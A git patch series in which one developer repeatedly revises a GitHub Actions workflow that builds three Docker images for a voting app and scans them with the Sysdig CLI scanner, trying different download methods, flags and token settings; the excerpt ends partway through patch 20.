From 2083638a0a3ac0dd0bf68017ca6f405987bfb2e4 Mon Sep 17 00:00:00 2001 From: keitahigaki Date: Wed, 16 Jul 2025 00:26:47 +0900 Subject: [PATCH 01/73] Add Sysdig CLI scan workflow --- .github/workflows/scan.yml | 1 + 1 file changed, 1 insertion(+) create mode 100644 .github/workflows/scan.yml diff --git a/.github/workflows/scan.yml b/.github/workflows/scan.yml new file mode 100644 index 0000000000..1becba2bb0 --- /dev/null +++ b/.github/workflows/scan.yml @@ -0,0 +1 @@ +404: Not Found \ No newline at end of file From ea50a2a7da215677cc3d53fe5c0300b3b6512ec1 Mon Sep 17 00:00:00 2001 From: keitahigaki Date: Wed, 16 Jul 2025 00:31:59 +0900 Subject: [PATCH 02/73] Fix: corrected scan.yml quoting for GitHub Actions --- .github/workflows/scan.yml | 36 +++++++++++++++++++++++++++++++++++- 1 file changed, 35 insertions(+), 1 deletion(-) diff --git a/.github/workflows/scan.yml b/.github/workflows/scan.yml index 1becba2bb0..0fcc1cedac 100644 --- a/.github/workflows/scan.yml +++ b/.github/workflows/scan.yml @@ -1 +1,35 @@ -404: Not Found \ No newline at end of file +name: Sysdig Image Scan + +on: + push: + branches: + - main + workflow_dispatch: + +jobs: + image-scan: + runs-on: ubuntu-latest + + steps: + - name: Checkout code + uses: actions/checkout@v3 + + - name: Build Docker images + run: | + docker build -t voting-app ./voting-app + docker build -t worker ./worker + docker build -t result ./result + + - name: Download Sysdig CLI Scanner + run: | + curl -sL https://download.sysdig.com/scanning/sysdig-cli-scanner/latest/linux/sysdig-cli-scanner -o scanner + chmod +x scanner + + - name: Run Sysdig Scan on voting-app + run: ./scanner --token ${{ secrets.SYSDIG_SECURE_TOKEN }} --image voting-app + + - name: Run Sysdig Scan on worker + run: ./scanner --token ${{ secrets.SYSDIG_SECURE_TOKEN }} --image worker + + - name: Run Sysdig Scan on result + run: ./scanner --token ${{ secrets.SYSDIG_SECURE_TOKEN }} --image result From 6d6c40a2d41354a7df0ba4b195d9eba7f6795601 Mon Sep 17 00:00:00 2001 From: keitahigaki Date: Wed, 16 Jul 2025 00:42:50 +0900 Subject: [PATCH 03/73] fix: correct voting-app Docker path to ./vote --- .github/workflows/scan.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/.github/workflows/scan.yml b/.github/workflows/scan.yml index 0fcc1cedac..2acc033de1 100644 --- a/.github/workflows/scan.yml +++ b/.github/workflows/scan.yml @@ -16,7 +16,7 @@ jobs: - name: Build Docker images run: | - docker build -t voting-app ./voting-app + docker build -t voting-app ./vote docker build -t worker ./worker docker build -t result ./result From c1b03dfe0b435907d2d4f2747f43bbe1084fc32a Mon Sep 17 00:00:00 2001 From: keitahigaki Date: Wed, 16 Jul 2025 00:47:21 +0900 Subject: [PATCH 04/73] fix: correct CLI scanner download URL --- .github/workflows/scan.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/.github/workflows/scan.yml b/.github/workflows/scan.yml index 2acc033de1..cda8091330 100644 --- a/.github/workflows/scan.yml +++ b/.github/workflows/scan.yml @@ -22,7 +22,7 @@ jobs: - name: Download Sysdig CLI Scanner run: | - curl -sL https://download.sysdig.com/scanning/sysdig-cli-scanner/latest/linux/sysdig-cli-scanner -o scanner + curl -sLo scanner https://download.sysdig.com/scanning/sysdig-cli-scanner/latest/sysdig-cli-scanner-linux-amd64 chmod +x scanner - name: Run Sysdig Scan on voting-app From d15504ce05f5c583142a83c7919905f87e068389 Mon Sep 17 00:00:00 2001 From: keitahigaki Date: Wed, 16 Jul 2025 00:56:37 +0900 Subject: [PATCH 05/73] trigger scan --- .github/workflows/scan.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/.github/workflows/scan.yml b/.github/workflows/scan.yml index cda8091330..5a74d142b3 100644 --- a/.github/workflows/scan.yml +++ b/.github/workflows/scan.yml @@ -22,7 +22,7 @@ jobs: - name: Download Sysdig CLI Scanner run: | - curl -sLo scanner https://download.sysdig.com/scanning/sysdig-cli-scanner/latest/sysdig-cli-scanner-linux-amd64 + curl -sSL https://download.sysdig.com/scanning/sysdig-cli-scanner/latest/sysdig-cli-scanner-linux-amd64 -o scanner chmod +x scanner - name: Run Sysdig Scan on voting-app From e2f6459b51d04a5230a1a435257d1421743e56f7 Mon Sep 17 00:00:00 2001 From: keitahigaki Date: Wed, 16 Jul 2025 01:02:34 +0900 Subject: [PATCH 06/73] correct scan.yml --- .github/workflows/scan.yml | 23 +++++++++++------------ 1 file changed, 11 insertions(+), 12 deletions(-) diff --git a/.github/workflows/scan.yml b/.github/workflows/scan.yml index 5a74d142b3..b56bdbec81 100644 --- a/.github/workflows/scan.yml +++ b/.github/workflows/scan.yml @@ -2,8 +2,7 @@ name: Sysdig Image Scan on: push: - branches: - - main + branches: [main] workflow_dispatch: jobs: @@ -11,8 +10,7 @@ jobs: runs-on: ubuntu-latest steps: - - name: Checkout code - uses: actions/checkout@v3 + - uses: actions/checkout@v3 - name: Build Docker images run: | @@ -22,14 +20,15 @@ jobs: - name: Download Sysdig CLI Scanner run: | - curl -sSL https://download.sysdig.com/scanning/sysdig-cli-scanner/latest/sysdig-cli-scanner-linux-amd64 -o scanner + curl -sSL "https://download.sysdig.com/scanning/bin/sysdig-cli-scanner/$(curl -L -s https://download.sysdig.com/scanning/sysdig-cli-scanner/latest_version.txt)/linux/amd64/sysdig-cli-scanner" -o scanner chmod +x scanner - - name: Run Sysdig Scan on voting-app - run: ./scanner --token ${{ secrets.SYSDIG_SECURE_TOKEN }} --image voting-app - - - name: Run Sysdig Scan on worker - run: ./scanner --token ${{ secrets.SYSDIG_SECURE_TOKEN }} --image worker + - name: Run Sysdig Scan + env: + SECURE_API_TOKEN: ${{ secrets.SYSDIG_SECURE_TOKEN }} + SYS_DIG_SECURE_URL: https://app.au1.sysdig.com + run: | + ./scanner --apiurl $SYS_DIG_SECURE_URL --token $SECURE_API_TOKEN docker://voting-app + ./scanner --apiurl $SYS_DIG_SECURE_URL --token $SECURE_API_TOKEN docker://worker + ./scanner --apiurl $SYS_DIG_SECURE_URL --token $SECURE_API_TOKEN docker://result - - name: Run Sysdig Scan on result - run: ./scanner --token ${{ secrets.SYSDIG_SECURE_TOKEN }} --image result From bc413297fb4fc7df5a62edde64b6efac98fcad3f Mon Sep 17 00:00:00 2001 From: keitahigaki Date: Wed, 16 Jul 2025 01:06:08 +0900 Subject: [PATCH 07/73] correctCLIversion scan.yml --- .github/workflows/scan.yml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/.github/workflows/scan.yml b/.github/workflows/scan.yml index b56bdbec81..e2230a5e2e 100644 --- a/.github/workflows/scan.yml +++ b/.github/workflows/scan.yml @@ -28,7 +28,7 @@ jobs: SECURE_API_TOKEN: ${{ secrets.SYSDIG_SECURE_TOKEN }} SYS_DIG_SECURE_URL: https://app.au1.sysdig.com run: | - ./scanner --apiurl $SYS_DIG_SECURE_URL --token $SECURE_API_TOKEN docker://voting-app - ./scanner --apiurl $SYS_DIG_SECURE_URL --token $SECURE_API_TOKEN docker://worker - ./scanner --apiurl $SYS_DIG_SECURE_URL --token $SECURE_API_TOKEN docker://result + ./scanner --apiurl $SYS_DIG_SECURE_URL --auth-token $SECURE_API_TOKEN docker://voting-app + ./scanner --apiurl $SYS_DIG_SECURE_URL --auth-token $SECURE_API_TOKEN docker://worker + ./scanner --apiurl $SYS_DIG_SECURE_URL --auth-token $SECURE_API_TOKEN docker://result From ad83a35153a2eac2d24275b7c2b92374602443d6 Mon Sep 17 00:00:00 2001 From: keitahigaki Date: Wed, 16 Jul 2025 01:23:19 +0900 Subject: [PATCH 08/73] Add Sysdig image scan workflow --- .github/workflows/scan.yml | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) diff --git a/.github/workflows/scan.yml b/.github/workflows/scan.yml index e2230a5e2e..0f5b65cea0 100644 --- a/.github/workflows/scan.yml +++ b/.github/workflows/scan.yml @@ -10,7 +10,8 @@ jobs: runs-on: ubuntu-latest steps: - - uses: actions/checkout@v3 + - name: Checkout source + uses: actions/checkout@v3 - name: Build Docker images run: | @@ -20,10 +21,10 @@ jobs: - name: Download Sysdig CLI Scanner run: | - curl -sSL "https://download.sysdig.com/scanning/bin/sysdig-cli-scanner/$(curl -L -s https://download.sysdig.com/scanning/sysdig-cli-scanner/latest_version.txt)/linux/amd64/sysdig-cli-scanner" -o scanner + curl -sSL "https://download.sysdig.com/scanning/bin/sysdig-cli-scanner/$(curl -sSL https://download.sysdig.com/scanning/sysdig-cli-scanner/latest_version.txt)/linux/amd64/sysdig-cli-scanner" -o scanner chmod +x scanner - - name: Run Sysdig Scan + - name: Run Sysdig Image Scan env: SECURE_API_TOKEN: ${{ secrets.SYSDIG_SECURE_TOKEN }} SYS_DIG_SECURE_URL: https://app.au1.sysdig.com From 3729c8d3d90b4ef23f031a0240422bf62848bf8b Mon Sep 17 00:00:00 2001 From: keitahigaki Date: Wed, 16 Jul 2025 01:27:31 +0900 Subject: [PATCH 09/73] Add Sysdig image scan workflow --- .github/workflows/scan.yml | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) diff --git a/.github/workflows/scan.yml b/.github/workflows/scan.yml index 0f5b65cea0..0b84536ed2 100644 --- a/.github/workflows/scan.yml +++ b/.github/workflows/scan.yml @@ -21,9 +21,10 @@ jobs: - name: Download Sysdig CLI Scanner run: | - curl -sSL "https://download.sysdig.com/scanning/bin/sysdig-cli-scanner/$(curl -sSL https://download.sysdig.com/scanning/sysdig-cli-scanner/latest_version.txt)/linux/amd64/sysdig-cli-scanner" -o scanner - chmod +x scanner - + LATEST_VERSION=$(curl -sSL https://download.sysdig.com/scanning/sysdig-cli-scanner/latest_version.txt) + curl -sSL "https://download.sysdig.com/scanning/bin/sysdig-cli-scanner/${LATEST_VERSION}/linux/amd64/sysdig-cli-scanner" -o sysdig-cli-scanner + chmod +x sysdig-cli-scanner + ./sysdig-cli-scanner version - name: Run Sysdig Image Scan env: SECURE_API_TOKEN: ${{ secrets.SYSDIG_SECURE_TOKEN }} From 291018b90b45136909e1f39f2a6226ec7571a1c2 Mon Sep 17 00:00:00 2001 From: keitahigaki Date: Wed, 16 Jul 2025 01:32:14 +0900 Subject: [PATCH 10/73] correct Sysdig image scan workflow --- .github/workflows/scan.yml | 11 ++++++----- 1 file changed, 6 insertions(+), 5 deletions(-) diff --git a/.github/workflows/scan.yml b/.github/workflows/scan.yml index 0b84536ed2..e754d92dc5 100644 --- a/.github/workflows/scan.yml +++ b/.github/workflows/scan.yml @@ -20,11 +20,12 @@ jobs: docker build -t result ./result - name: Download Sysdig CLI Scanner - run: | - LATEST_VERSION=$(curl -sSL https://download.sysdig.com/scanning/sysdig-cli-scanner/latest_version.txt) - curl -sSL "https://download.sysdig.com/scanning/bin/sysdig-cli-scanner/${LATEST_VERSION}/linux/amd64/sysdig-cli-scanner" -o sysdig-cli-scanner - chmod +x sysdig-cli-scanner - ./sysdig-cli-scanner version + run: | +     version=$(curl -sSL https://download.sysdig.com/scanning/sysdig-cli-scanner/latest_version.txt) +    echo "Latest version is $version" +    curl -sSL "https://download.sysdig.com/scanning/bin/sysdig-cli-scanner/${version}/linux/amd64/sysdig-cli-scanner" -o sysdig-cli-scanner +    chmod +x sysdig-cli-scanner +    ./sysdig-cli-scanner --version - name: Run Sysdig Image Scan env: SECURE_API_TOKEN: ${{ secrets.SYSDIG_SECURE_TOKEN }} From ffecc38b1055ef4bdf15d4f808b65f39eac00587 Mon Sep 17 00:00:00 2001 From: keitahigaki Date: Wed, 16 Jul 2025 01:34:27 +0900 Subject: [PATCH 11/73] correct Sysdig image scan workflow --- .github/workflows/scan.yml | 24 +++++++++++++----------- 1 file changed, 13 insertions(+), 11 deletions(-) diff --git a/.github/workflows/scan.yml b/.github/workflows/scan.yml index e754d92dc5..35085b7439 100644 --- a/.github/workflows/scan.yml +++ b/.github/workflows/scan.yml @@ -10,7 +10,7 @@ jobs: runs-on: ubuntu-latest steps: - - name: Checkout source + - name: Checkout code uses: actions/checkout@v3 - name: Build Docker images @@ -20,18 +20,20 @@ jobs: docker build -t result ./result - name: Download Sysdig CLI Scanner - run: | -     version=$(curl -sSL https://download.sysdig.com/scanning/sysdig-cli-scanner/latest_version.txt) -    echo "Latest version is $version" -    curl -sSL "https://download.sysdig.com/scanning/bin/sysdig-cli-scanner/${version}/linux/amd64/sysdig-cli-scanner" -o sysdig-cli-scanner -    chmod +x sysdig-cli-scanner -    ./sysdig-cli-scanner --version - - name: Run Sysdig Image Scan + run: | + echo "Fetching latest scanner version..." + VERSION=$(curl -sSL https://download.sysdig.com/scanning/sysdig-cli-scanner/latest_version.txt) + echo "Latest version: $VERSION" + curl -sSL "https://download.sysdig.com/scanning/bin/sysdig-cli-scanner/${VERSION}/linux/amd64/sysdig-cli-scanner" -o sysdig-cli-scanner + chmod +x sysdig-cli-scanner + ./sysdig-cli-scanner --version + + - name: Run Sysdig Scan env: SECURE_API_TOKEN: ${{ secrets.SYSDIG_SECURE_TOKEN }} SYS_DIG_SECURE_URL: https://app.au1.sysdig.com run: | - ./scanner --apiurl $SYS_DIG_SECURE_URL --auth-token $SECURE_API_TOKEN docker://voting-app - ./scanner --apiurl $SYS_DIG_SECURE_URL --auth-token $SECURE_API_TOKEN docker://worker - ./scanner --apiurl $SYS_DIG_SECURE_URL --auth-token $SECURE_API_TOKEN docker://result + ./sysdig-cli-scanner --apiurl $SYS_DIG_SECURE_URL --auth-token $SECURE_API_TOKEN docker://voting-app + ./sysdig-cli-scanner --apiurl $SYS_DIG_SECURE_URL --auth-token $SECURE_API_TOKEN docker://worker + ./sysdig-cli-scanner --apiurl $SYS_DIG_SECURE_URL --auth-token $SECURE_API_TOKEN docker://result From 33dd48344b319a35da619e60ad5f333cafd4f3a9 Mon Sep 17 00:00:00 2001 From: keitahigaki Date: Wed, 16 Jul 2025 01:38:44 +0900 Subject: [PATCH 12/73] correct Sysdig image scan workflow --- .github/workflows/scan.yml | 11 +++++------ 1 file changed, 5 insertions(+), 6 deletions(-) diff --git a/.github/workflows/scan.yml b/.github/workflows/scan.yml index 35085b7439..f8849627d0 100644 --- a/.github/workflows/scan.yml +++ b/.github/workflows/scan.yml @@ -10,7 +10,7 @@ jobs: runs-on: ubuntu-latest steps: - - name: Checkout code + - name: Checkout source uses: actions/checkout@v3 - name: Build Docker images @@ -21,19 +21,18 @@ jobs: - name: Download Sysdig CLI Scanner run: | - echo "Fetching latest scanner version..." VERSION=$(curl -sSL https://download.sysdig.com/scanning/sysdig-cli-scanner/latest_version.txt) echo "Latest version: $VERSION" curl -sSL "https://download.sysdig.com/scanning/bin/sysdig-cli-scanner/${VERSION}/linux/amd64/sysdig-cli-scanner" -o sysdig-cli-scanner chmod +x sysdig-cli-scanner ./sysdig-cli-scanner --version - - name: Run Sysdig Scan + - name: Run Sysdig CLI Scanner env: SECURE_API_TOKEN: ${{ secrets.SYSDIG_SECURE_TOKEN }} SYS_DIG_SECURE_URL: https://app.au1.sysdig.com run: | - ./sysdig-cli-scanner --apiurl $SYS_DIG_SECURE_URL --auth-token $SECURE_API_TOKEN docker://voting-app - ./sysdig-cli-scanner --apiurl $SYS_DIG_SECURE_URL --auth-token $SECURE_API_TOKEN docker://worker - ./sysdig-cli-scanner --apiurl $SYS_DIG_SECURE_URL --auth-token $SECURE_API_TOKEN docker://result + ./sysdig-cli-scanner --apiurl $SYS_DIG_SECURE_URL --token $SECURE_API_TOKEN docker://voting-app + ./sysdig-cli-scanner --apiurl $SYS_DIG_SECURE_URL --token $SECURE_API_TOKEN docker://worker + ./sysdig-cli-scanner --apiurl $SYS_DIG_SECURE_URL --token $SECURE_API_TOKEN docker://result From 35949369af0f35175470a1b6e7d62f22d732eea4 Mon Sep 17 00:00:00 2001 From: keitahigaki Date: Wed, 16 Jul 2025 01:46:36 +0900 Subject: [PATCH 13/73] correct Sysdig image scan workflow --- .github/workflows/scan.yml | 40 +++++++++++++++++++++++--------------- 1 file changed, 24 insertions(+), 16 deletions(-) diff --git a/.github/workflows/scan.yml b/.github/workflows/scan.yml index f8849627d0..fdb7c52d30 100644 --- a/.github/workflows/scan.yml +++ b/.github/workflows/scan.yml @@ -1,4 +1,4 @@ -name: Sysdig Image Scan +name: Sysdig Container Scanner (Stable) on: push: @@ -6,11 +6,11 @@ on: workflow_dispatch: jobs: - image-scan: + scan: runs-on: ubuntu-latest steps: - - name: Checkout source + - name: Checkout uses: actions/checkout@v3 - name: Build Docker images @@ -19,20 +19,28 @@ jobs: docker build -t worker ./worker docker build -t result ./result - - name: Download Sysdig CLI Scanner - run: | - VERSION=$(curl -sSL https://download.sysdig.com/scanning/sysdig-cli-scanner/latest_version.txt) - echo "Latest version: $VERSION" - curl -sSL "https://download.sysdig.com/scanning/bin/sysdig-cli-scanner/${VERSION}/linux/amd64/sysdig-cli-scanner" -o sysdig-cli-scanner - chmod +x sysdig-cli-scanner - ./sysdig-cli-scanner --version - - - name: Run Sysdig CLI Scanner + - name: Run Sysdig CLI Scanner (Dockerized) env: SECURE_API_TOKEN: ${{ secrets.SYSDIG_SECURE_TOKEN }} - SYS_DIG_SECURE_URL: https://app.au1.sysdig.com run: | - ./sysdig-cli-scanner --apiurl $SYS_DIG_SECURE_URL --token $SECURE_API_TOKEN docker://voting-app - ./sysdig-cli-scanner --apiurl $SYS_DIG_SECURE_URL --token $SECURE_API_TOKEN docker://worker - ./sysdig-cli-scanner --apiurl $SYS_DIG_SECURE_URL --token $SECURE_API_TOKEN docker://result + docker run --rm \ + -v /var/run/docker.sock:/var/run/docker.sock \ + quay.io/sysdig/sysdig-cli-scanner:latest \ + --apiurl https://app.au1.sysdig.com \ + --token $SECURE_API_TOKEN \ + docker://voting-app + + docker run --rm \ + -v /var/run/docker.sock:/var/run/docker.sock \ + quay.io/sysdig/sysdig-cli-scanner:latest \ + --apiurl https://app.au1.sysdig.com \ + --token $SECURE_API_TOKEN \ + docker://worker + + docker run --rm \ + -v /var/run/docker.sock:/var/run/docker.sock \ + quay.io/sysdig/sysdig-cli-scanner:latest \ + --apiurl https://app.au1.sysdig.com \ + --token $SECURE_API_TOKEN \ + docker://result From 591531824ad6e10cf4e66cc3211c585d08e5fea9 Mon Sep 17 00:00:00 2001 From: keitahigaki Date: Wed, 16 Jul 2025 01:49:22 +0900 Subject: [PATCH 14/73] correct Sysdig image scan workflow --- .github/workflows/scan.yml | 23 ++++++++++++----------- 1 file changed, 12 insertions(+), 11 deletions(-) diff --git a/.github/workflows/scan.yml b/.github/workflows/scan.yml index fdb7c52d30..32b191a7e9 100644 --- a/.github/workflows/scan.yml +++ b/.github/workflows/scan.yml @@ -1,4 +1,4 @@ -name: Sysdig Container Scanner (Stable) +name: Sysdig Image Scan on: push: @@ -21,26 +21,27 @@ jobs: - name: Run Sysdig CLI Scanner (Dockerized) env: - SECURE_API_TOKEN: ${{ secrets.SYSDIG_SECURE_TOKEN }} + SYSDIG_API_TOKEN: ${{ secrets.SYSDIG_SECURE_TOKEN }} + SYSDIG_API_URL: https://app.au1.sysdig.com run: | docker run --rm \ -v /var/run/docker.sock:/var/run/docker.sock \ - quay.io/sysdig/sysdig-cli-scanner:latest \ - --apiurl https://app.au1.sysdig.com \ - --token $SECURE_API_TOKEN \ + -e SYSDIG_API_TOKEN \ + -e SYSDIG_API_URL \ + quay.io/sysdig/sysdig-cli-scanner \ docker://voting-app docker run --rm \ -v /var/run/docker.sock:/var/run/docker.sock \ - quay.io/sysdig/sysdig-cli-scanner:latest \ - --apiurl https://app.au1.sysdig.com \ - --token $SECURE_API_TOKEN \ + -e SYSDIG_API_TOKEN \ + -e SYSDIG_API_URL \ + quay.io/sysdig/sysdig-cli-scanner \ docker://worker docker run --rm \ -v /var/run/docker.sock:/var/run/docker.sock \ - quay.io/sysdig/sysdig-cli-scanner:latest \ - --apiurl https://app.au1.sysdig.com \ - --token $SECURE_API_TOKEN \ + -e SYSDIG_API_TOKEN \ + -e SYSDIG_API_URL \ + quay.io/sysdig/sysdig-cli-scanner \ docker://result From a0453311300df6189267d376b6a052d1ef5ce497 Mon Sep 17 00:00:00 2001 From: keitahigaki Date: Wed, 16 Jul 2025 01:52:00 +0900 Subject: [PATCH 15/73] correct Sysdig image scan workflow --- .github/workflows/scan.yml | 25 ++++++++++++------------- 1 file changed, 12 insertions(+), 13 deletions(-) diff --git a/.github/workflows/scan.yml b/.github/workflows/scan.yml index 32b191a7e9..a9dc4a134f 100644 --- a/.github/workflows/scan.yml +++ b/.github/workflows/scan.yml @@ -10,7 +10,7 @@ jobs: runs-on: ubuntu-latest steps: - - name: Checkout + - name: Checkout code uses: actions/checkout@v3 - name: Build Docker images @@ -19,29 +19,28 @@ jobs: docker build -t worker ./worker docker build -t result ./result - - name: Run Sysdig CLI Scanner (Dockerized) + - name: Run Sysdig CLI Scanner (with CLI flags) env: - SYSDIG_API_TOKEN: ${{ secrets.SYSDIG_SECURE_TOKEN }} - SYSDIG_API_URL: https://app.au1.sysdig.com + SECURE_API_TOKEN: ${{ secrets.SYSDIG_SECURE_TOKEN }} run: | docker run --rm \ -v /var/run/docker.sock:/var/run/docker.sock \ - -e SYSDIG_API_TOKEN \ - -e SYSDIG_API_URL \ - quay.io/sysdig/sysdig-cli-scanner \ + quay.io/sysdig/sysdig-cli-scanner:latest \ + --apiurl https://app.au1.sysdig.com \ + --client-token $SECURE_API_TOKEN \ docker://voting-app docker run --rm \ -v /var/run/docker.sock:/var/run/docker.sock \ - -e SYSDIG_API_TOKEN \ - -e SYSDIG_API_URL \ - quay.io/sysdig/sysdig-cli-scanner \ + quay.io/sysdig/sysdig-cli-scanner:latest \ + --apiurl https://app.au1.sysdig.com \ + --client-token $SECURE_API_TOKEN \ docker://worker docker run --rm \ -v /var/run/docker.sock:/var/run/docker.sock \ - -e SYSDIG_API_TOKEN \ - -e SYSDIG_API_URL \ - quay.io/sysdig/sysdig-cli-scanner \ + quay.io/sysdig/sysdig-cli-scanner:latest \ + --apiurl https://app.au1.sysdig.com \ + --client-token $SECURE_API_TOKEN \ docker://result From b94af43c4405945278875f14c142c1832e35b098 Mon Sep 17 00:00:00 2001 From: keitahigaki Date: Wed, 16 Jul 2025 01:55:05 +0900 Subject: [PATCH 16/73] correct Sysdig image scan workflow --- .github/workflows/scan.yml | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/.github/workflows/scan.yml b/.github/workflows/scan.yml index a9dc4a134f..5201e9337e 100644 --- a/.github/workflows/scan.yml +++ b/.github/workflows/scan.yml @@ -19,7 +19,7 @@ jobs: docker build -t worker ./worker docker build -t result ./result - - name: Run Sysdig CLI Scanner (with CLI flags) + - name: Run Sysdig CLI Scanner (Dockerized) env: SECURE_API_TOKEN: ${{ secrets.SYSDIG_SECURE_TOKEN }} run: | @@ -27,20 +27,20 @@ jobs: -v /var/run/docker.sock:/var/run/docker.sock \ quay.io/sysdig/sysdig-cli-scanner:latest \ --apiurl https://app.au1.sysdig.com \ - --client-token $SECURE_API_TOKEN \ + --token $SECURE_API_TOKEN \ docker://voting-app docker run --rm \ -v /var/run/docker.sock:/var/run/docker.sock \ quay.io/sysdig/sysdig-cli-scanner:latest \ --apiurl https://app.au1.sysdig.com \ - --client-token $SECURE_API_TOKEN \ + --token $SECURE_API_TOKEN \ docker://worker docker run --rm \ -v /var/run/docker.sock:/var/run/docker.sock \ quay.io/sysdig/sysdig-cli-scanner:latest \ --apiurl https://app.au1.sysdig.com \ - --client-token $SECURE_API_TOKEN \ + --token $SECURE_API_TOKEN \ docker://result From 8fb5b7858e9ae134d4f17379afda48aa353a993c Mon Sep 17 00:00:00 2001 From: keitahigaki Date: Wed, 16 Jul 2025 01:58:05 +0900 Subject: [PATCH 17/73] correct Sysdig image scan workflow --- .github/workflows/scan.yml | 36 +++++++++++++++++++++--------------- 1 file changed, 21 insertions(+), 15 deletions(-) diff --git a/.github/workflows/scan.yml b/.github/workflows/scan.yml index 5201e9337e..78d8834ee8 100644 --- a/.github/workflows/scan.yml +++ b/.github/workflows/scan.yml @@ -2,13 +2,17 @@ name: Sysdig Image Scan on: push: - branches: [main] + branches: + - main workflow_dispatch: +env: + SECURE_API_TOKEN: ${{ secrets.SECURE_API_TOKEN }} + SYS_DIG_SECURE_URL: https://app.au1.sysdig.com + jobs: - scan: + image-scan: runs-on: ubuntu-latest - steps: - name: Checkout code uses: actions/checkout@v3 @@ -19,28 +23,30 @@ jobs: docker build -t worker ./worker docker build -t result ./result - - name: Run Sysdig CLI Scanner (Dockerized) - env: - SECURE_API_TOKEN: ${{ secrets.SYSDIG_SECURE_TOKEN }} + - name: Run Sysdig Scan on voting-app run: | docker run --rm \ -v /var/run/docker.sock:/var/run/docker.sock \ quay.io/sysdig/sysdig-cli-scanner:latest \ - --apiurl https://app.au1.sysdig.com \ - --token $SECURE_API_TOKEN \ - docker://voting-app + scan docker://voting-app \ + --apiurl $SYS_DIG_SECURE_URL \ + --client-token $SECURE_API_TOKEN + - name: Run Sysdig Scan on worker + run: | docker run --rm \ -v /var/run/docker.sock:/var/run/docker.sock \ quay.io/sysdig/sysdig-cli-scanner:latest \ - --apiurl https://app.au1.sysdig.com \ - --token $SECURE_API_TOKEN \ - docker://worker + scan docker://worker \ + --apiurl $SYS_DIG_SECURE_URL \ + --client-token $SECURE_API_TOKEN + - name: Run Sysdig Scan on result + run: | docker run --rm \ -v /var/run/docker.sock:/var/run/docker.sock \ quay.io/sysdig/sysdig-cli-scanner:latest \ - --apiurl https://app.au1.sysdig.com \ - --token $SECURE_API_TOKEN \ - docker://result + scan docker://result \ + --apiurl $SYS_DIG_SECURE_URL \ + --client-token $SECURE_API_TOKEN From ea473d12851cbdecfedc4aa19e734a5cf7842ceb Mon Sep 17 00:00:00 2001 From: keitahigaki Date: Wed, 16 Jul 2025 02:03:57 +0900 Subject: [PATCH 18/73] correct Sysdig image scan workflow --- .github/workflows/scan.yml | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) diff --git a/.github/workflows/scan.yml b/.github/workflows/scan.yml index 78d8834ee8..9a3b30ca2b 100644 --- a/.github/workflows/scan.yml +++ b/.github/workflows/scan.yml @@ -13,6 +13,7 @@ env: jobs: image-scan: runs-on: ubuntu-latest + steps: - name: Checkout code uses: actions/checkout@v3 @@ -30,7 +31,7 @@ jobs: quay.io/sysdig/sysdig-cli-scanner:latest \ scan docker://voting-app \ --apiurl $SYS_DIG_SECURE_URL \ - --client-token $SECURE_API_TOKEN + --token $SECURE_API_TOKEN - name: Run Sysdig Scan on worker run: | @@ -39,7 +40,7 @@ jobs: quay.io/sysdig/sysdig-cli-scanner:latest \ scan docker://worker \ --apiurl $SYS_DIG_SECURE_URL \ - --client-token $SECURE_API_TOKEN + --token $SECURE_API_TOKEN - name: Run Sysdig Scan on result run: | @@ -48,5 +49,5 @@ jobs: quay.io/sysdig/sysdig-cli-scanner:latest \ scan docker://result \ --apiurl $SYS_DIG_SECURE_URL \ - --client-token $SECURE_API_TOKEN + --token $SECURE_API_TOKEN From 8896a06386a538c1af144dba7b0e7a6c147d0df9 Mon Sep 17 00:00:00 2001 From: keitahigaki Date: Wed, 16 Jul 2025 02:08:10 +0900 Subject: [PATCH 19/73] correct Sysdig image scan workflow --- .github/workflows/scan.yml | 25 ++++++++++++------------- 1 file changed, 12 insertions(+), 13 deletions(-) diff --git a/.github/workflows/scan.yml b/.github/workflows/scan.yml index 9a3b30ca2b..2b9d45b590 100644 --- a/.github/workflows/scan.yml +++ b/.github/workflows/scan.yml @@ -1,9 +1,8 @@ -name: Sysdig Image Scan +name: Sysdig Docker Image Scan on: push: - branches: - - main + branches: [main] workflow_dispatch: env: @@ -15,7 +14,7 @@ jobs: runs-on: ubuntu-latest steps: - - name: Checkout code + - name: Checkout uses: actions/checkout@v3 - name: Build Docker images @@ -24,30 +23,30 @@ jobs: docker build -t worker ./worker docker build -t result ./result - - name: Run Sysdig Scan on voting-app + - name: Scan voting-app run: | docker run --rm \ -v /var/run/docker.sock:/var/run/docker.sock \ quay.io/sysdig/sysdig-cli-scanner:latest \ scan docker://voting-app \ - --apiurl $SYS_DIG_SECURE_URL \ - --token $SECURE_API_TOKEN + --apiurl "$SYS_DIG_SECURE_URL" \ + --token "$SECURE_API_TOKEN" - - name: Run Sysdig Scan on worker + - name: Scan worker run: | docker run --rm \ -v /var/run/docker.sock:/var/run/docker.sock \ quay.io/sysdig/sysdig-cli-scanner:latest \ scan docker://worker \ - --apiurl $SYS_DIG_SECURE_URL \ - --token $SECURE_API_TOKEN + --apiurl "$SYS_DIG_SECURE_URL" \ + --token "$SECURE_API_TOKEN" - - name: Run Sysdig Scan on result + - name: Scan result run: | docker run --rm \ -v /var/run/docker.sock:/var/run/docker.sock \ quay.io/sysdig/sysdig-cli-scanner:latest \ scan docker://result \ - --apiurl $SYS_DIG_SECURE_URL \ - --token $SECURE_API_TOKEN + --apiurl "$SYS_DIG_SECURE_URL" \ + --token "$SECURE_API_TOKEN" From b230cc5e7d9a91da9c4b65c059b1d12796569653 Mon Sep 17 00:00:00 2001 From: keitahigaki Date: Wed, 16 Jul 2025 09:50:06 +0900 Subject: [PATCH 20/73] correct Sysdig image scan workflow --- .github/workflows/scan.yml | 36 ++++++++++++++++-------------------- 1 file changed, 16 insertions(+), 20 deletions(-) diff --git a/.github/workflows/scan.yml b/.github/workflows/scan.yml index 2b9d45b590..72936770e6 100644 --- a/.github/workflows/scan.yml +++ b/.github/workflows/scan.yml @@ -6,15 +6,15 @@ on: workflow_dispatch: env: - SECURE_API_TOKEN: ${{ secrets.SECURE_API_TOKEN }} SYS_DIG_SECURE_URL: https://app.au1.sysdig.com + 